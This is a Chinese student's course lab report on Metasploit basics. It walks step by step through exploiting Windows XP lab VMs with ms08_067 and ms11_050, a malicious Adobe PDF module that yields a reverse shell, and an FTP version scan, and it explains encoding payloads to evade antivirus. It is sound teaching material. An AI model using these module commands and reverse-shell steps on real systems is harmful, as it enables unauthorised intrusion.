20145231熊梓宏 《网络对抗》 实验5 MSF基础应用
基础问题回答
1.用自己的话解释什么是exploit,payload,encode?
exploit就相当于是就是渗透攻击,其实就是针对各种服务、系统的漏洞进行攻击(传送某种攻击)。
payload就相当于攻击载荷,我们实验中做过shellcode,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。较小的代码就作为独立体,较大的代码需要一个传输器,建立某种联系,使得不会因攻击代码过长而被发现。
encode就是编码,它主要是为了避免之前的payload中出现坏字符;其次是为了实现免杀,不让杀毒软件轻易发现payload是攻击代码。
实践内容
因为电脑实在太卡所以很抱歉很多图片都是拍的
1.主动攻击:ms08_067漏洞攻击
靶机:WinXPenSP3 ip:192.168.205.129
先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块:
用use exploit/windows/smb/ms08_067_netapi使用该模块,再使用show payloads查看可以供我们使用的payload:
我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置:
接着使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):
设置完相应的参数后,再次使用show options对攻击的选项进行查看。
接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:
(因为几度卡死,kali在硬盘里,强制关机开机损坏了硬盘相关扇区,导致电脑无法读取硬盘数据,下载了检测修复软件,但是要格式化,准备找boot引导区代码自己尝试修复,所以先借同学电脑完成)
2.对浏览器攻击:ms11_050漏洞攻击
靶机:WinXPattacker ip:192.168.205.129
基本步骤还是和上面一样,先利用search ms11_050指令查看可以运用的攻击模块
然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:
设置好参数后,进行查看:
使用exploit指令执行漏洞,可以看到生成了一个url:
在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功,使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话:
使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息:
3.对Adobe的漏洞攻击:adobe_pdf_embedded_exe、adobe_toolbutton
靶机:WinXPenSP3
查看Adobe靶机
先使用search adobe查询和adobe漏洞有关的模块,我选择的是exploit/windows/fileformat/adobe_pdf_embedded_exe,然后使用该模块,设置回连的payload:
查看需要设置的参数:
设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个5231.pdf文件:
然后将该文件传送到靶机上,并且在攻击机上打开监听,将靶机中的pdf文件打开,但是,阅读器一直说这个文件类型不支持用adobe打开(可能是不同漏洞操作不太相同?),然后还是换了一个漏洞:adobe_toolbutton,按照相同步骤,成功获取靶机shell和系统信息:
4.辅助模块的应用:ftp_version
靶机:WinXPenSP3 ip:192.168.205.129
使用show auxiliary查看可以运用的辅助模块:
我使用的是scanner/ftp/ftp_version,用来对靶机的ftp版本进行扫描,设置靶机的IP地址:
使用exploit指令开始扫描,成功扫描到靶机的ftp版本:
实践体会
出现问题,解决问题。硬盘还没有修复好,心痛。